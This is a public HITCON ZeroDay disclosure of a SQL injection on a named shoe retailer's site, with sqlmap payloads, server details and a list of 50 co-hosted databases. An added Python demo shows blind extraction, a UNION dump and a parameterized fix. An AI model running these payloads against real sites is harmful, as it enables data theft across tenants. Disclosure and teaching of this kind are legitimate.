Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00054
- Vendor: QWQ創意鞋坊
- Title: SQL injection in QWQ創意鞋坊, affecting at least 10 sites on the same host
- Introduction: High-privilege database injection vulnerability
Handling status
Current status:
- New submission
- Reviewed
- Reported to vendor
- Vendor has not reported a fix
- Not retested
- Public
Handling history
- 2016/03/10 17:03:04 : New submission (status updated by 鄉民)
- 2016/03/16 01:42:15 : Review completed (status updated by the HITCON ZeroDay service team)
- 2016/04/04 19:29:25 : Reported, vendor did not respond (status updated by the HITCON ZeroDay service team)
- 2016/05/25 01:30:57 : Public (status updated by the HITCON ZeroDay service team)
Details
- ZDID: ZD-2016-00054
- Reporter: UCCU (鄉民)
- Risk: Critical
- Type: Database injection attack (SQL Injection)
References
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Description
Affected URL: http://www.qwq.com.tw/prod_list.php?class_id=2
Injection point: class_id
Parameter: class_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class_id=2 AND 2380=2380
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: class_id=2 AND (SELECT * FROM (SELECT(SLEEP(30)))ylUm)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: class_id=2 UNION ALL SELECT CONCAT(0x7171627071,0x6e497856735048777a4b586a444f6a686e4c4e4849486f74794d616644724f6452596b4a4d674c49,0x7178707071),NULL-- -
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
current user is DBA: True
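The three sqlmap payloads above are easier to reason about when run against a small stand-in database. The following is an added example, not code from the page or from the affected site: SQLite replaces the site's MySQL backend (so CONCAT and SLEEP are not reproduced), and the table and column names (`products`, `admins`, `pwhash`) are invented. It builds the query the same way the report implies prod_list.php does, pasting `class_id` straight into the SQL text, then shows why "boolean-based blind" is enough to read arbitrary data one character at a time, why a two-column UNION dumps another table outright, and how the parameterized version refuses all of it.

```python
import sqlite3


def setup_db():
    """Constructed sample data (SQLite stands in for MySQL; names are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, class_id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 2, 'Sneaker'), (2, 2, 'Loafer'), (3, 3, 'Boot');
        CREATE TABLE admins (id INTEGER, username TEXT, pwhash TEXT);
        INSERT INTO admins VALUES (1, 'admin', 'deadbeef');
    """)
    conn.commit()
    return conn


def prod_list_vulnerable(conn, class_id):
    """The bug pattern behind the report: the GET value is concatenated into the SQL text."""
    sql = "SELECT name, id FROM products WHERE class_id=" + class_id
    return conn.execute(sql).fetchall()


def prod_list_fixed(conn, class_id):
    """Hardened form: validate the type, then bind the value as a parameter."""
    cid = int(class_id)  # ValueError for anything that is not an integer
    return conn.execute(
        "SELECT name, id FROM products WHERE class_id=?", (cid,)
    ).fetchall()


def blind_oracle(conn, condition):
    """Boolean-based blind: the page content differs depending on an injected condition.
    Same shape as the report's 'class_id=2 AND 2380=2380' payload."""
    rows = prod_list_vulnerable(conn, "2 AND (" + condition + ")")
    return len(rows) > 0


def blind_extract(conn, expr, max_len=32):
    """Read the result of an arbitrary scalar subquery one character at a time,
    asking only true/false questions. This is what sqlmap automates behind the
    'boolean-based blind' technique."""
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):  # printable ASCII
            probe = f"unicode(substr(({expr}),{pos},1))={code}"
            if blind_oracle(conn, probe):
                found = chr(code)
                break
        if found is None:  # past the end of the string
            break
        out += found
    return out


def union_dump(conn):
    """UNION query, 2 columns: pull rows from another table straight into the
    product listing. The report's payload used CONCAT(...),NULL; SQLite uses ||."""
    payload = "2 UNION ALL SELECT username||':'||pwhash, NULL FROM admins-- -"
    return prod_list_vulnerable(conn, payload)


if __name__ == "__main__":
    db = setup_db()
    print("true  condition ->", prod_list_vulnerable(db, "2 AND 2380=2380"))
    print("false condition ->", prod_list_vulnerable(db, "2 AND 2380=2381"))
    print("blind extract   ->", blind_extract(db, "SELECT pwhash FROM admins LIMIT 1"))
    print("union dump      ->", union_dump(db))
    try:
        prod_list_fixed(db, "2 AND 2380=2380")
    except ValueError as e:
        print("fixed query rejected payload:", e)
```

Parameterization fixes the injection itself, but the report's "current user is DBA: True" and the 50 databases that follow are a second, independent problem: the web application connects with an account that can read every other site's schema on the host. Even with prepared statements in place, the site should run under a dedicated MySQL account granted only the privileges it needs on its own database (qwq_db), so that a future injection bug in one site cannot reach the other tenants.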
available databases [50]:
[] #mysql50#c_c_chen_db-1040923
[] #mysql50#db_Breville-test
[] #mysql50#db_pinoh-1050207
[] #mysql50#db_pinoh-1050208
[] acnt
[] c_c_chen_db
[] db_amigosoft
[] db_amigosoft1022
[] db_amigosoft_cn
[] db_amigosoft_cn1022
[] db_Breville
[] db_Breville1040917
[] db_Breville1041011
[] db_Breville_cn
[] db_clife
[] db_hunter_cn
[] db_pinoh
[] db_pinoh1040917
[] db_pinoh_cn
[] db_shark
[] db_transcom
[] efun_db
[] efun_gb_db
[] guan_nan_2_db
[] guan_nan_db
[] information_schema
[] jcbio_db
[] jia_mei_cn_db
[] jia_mei_db
[] jiaen_tax
[] mem2_en_db
[] mem2_esp_db
[] mem2_rus_db
[] mysql
[] o_dear_db
[] o_dear_gb_db
[] o_dear_sales_system
[] pisco_db
[] qwq_db
[] seven_db
[] shinhuaforest_db
[] shinhuaforest_db1040922
[] skypro_db
[] smf_db
[] sugaru_db
[] taccn
[] taccn_tax
[] test
[] tnsuccess_db
[] yengyue_db